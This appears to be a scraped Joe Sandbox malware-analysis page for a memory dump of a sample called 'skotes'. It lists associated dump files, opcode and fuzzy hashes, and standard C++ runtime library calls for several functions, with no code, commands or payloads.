Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 79c4a838d18e62d08823a36cf380129554bffc3611619a36cb03c44c9ada03b9
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: 5E51AA75A042099FDF10CFA8C4806EEBBF4EFE6364F14449AE850A7351D3BAAA05CB54

Function 0049DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049DB64

Part of subcall function 00498F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00498F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0049DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0049DBE9
Concurrency::location::_Assign.LIBCMT ref: 0049DC56

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 8abcc60e7c2b5acacd10bccb9d675915e6b6017cdc55e11b3c993568605438c3
Instruction ID: 225838d27c0b58331e0a5e061771d87d1505f196450d104e60500bd681ef5776
Opcode Fuzzy Hash: 8abcc60e7c2b5acacd10bccb9d675915e6b6017cdc55e11b3c993568605438c3
Instruction Fuzzy Hash: FF41F474A04210ABDF19EB25C886BBEBF75AF45314F0440AFE5069B3C2CB78AD45C799

Function 004956AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 004956F2
_InternalDeleteHelper.LIBCONCRT ref: 00495726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0049578B
SafeRWList.LIBCONCRT ref: 0049579A

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: 286aa2dd99d415585428276457146c2e02fa1c3e53dfea394c73a086a940c144
Instruction ID: 429782b41b9e22d3c1f437e4ea17532477d96aff68f1c057c547aed83ebc9091
Opcode Fuzzy Hash: 286aa2dd99d415585428276457146c2e02fa1c3e53dfea394c73a086a940c144
Instruction Fuzzy Hash: 16312636B015108FCF05AF60D885EAD7BA6AFC8710F2841BEE9099B395DF34AD058B94

Function 00492CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00492D0F

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 52535be4ce39931388c3a83df26eeccda4447c7452a579cc807d31911f904747
Instruction ID: d19bd16b35b48c20dd5958c561c3d638c43296ad1ee6cd28844bba6b37c5a17e
Opcode Fuzzy Hash: 52535be4ce39931388c3a83df26eeccda4447c7452a579cc807d31911f904747
Instruction Fuzzy Hash: A6315775A00309EFCF10DF94CAC0AAE7FB9BB44314F1405BAD901AB346D7B4A945DBA5

Function 004A13F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004A13FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 004A1447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 004A147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 004A152A

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: c2bf0e65f0a99ceacee01da94d42cbf803a5d47e35d9985f5e3f55b20e22f6eb
Instruction ID: 99832ec09e265e12a37df875021d32efc3aa5f64c7ddc8087ed9f46523728d13
Opcode Fuzzy Hash: c2bf0e65f0a99ceacee01da94d42cbf803a5d47e35d9985f5e3f55b20e22f6eb
Instruction Fuzzy Hash: 2E31A371E006059FCF14EFA9C4919EDFBB1BF59714B14822EE416A7391CB38AD41CB98

Function 0048BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0048BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0048BBE4
_xtime_get.LIBCPMT ref: 0048BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0048BC13

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
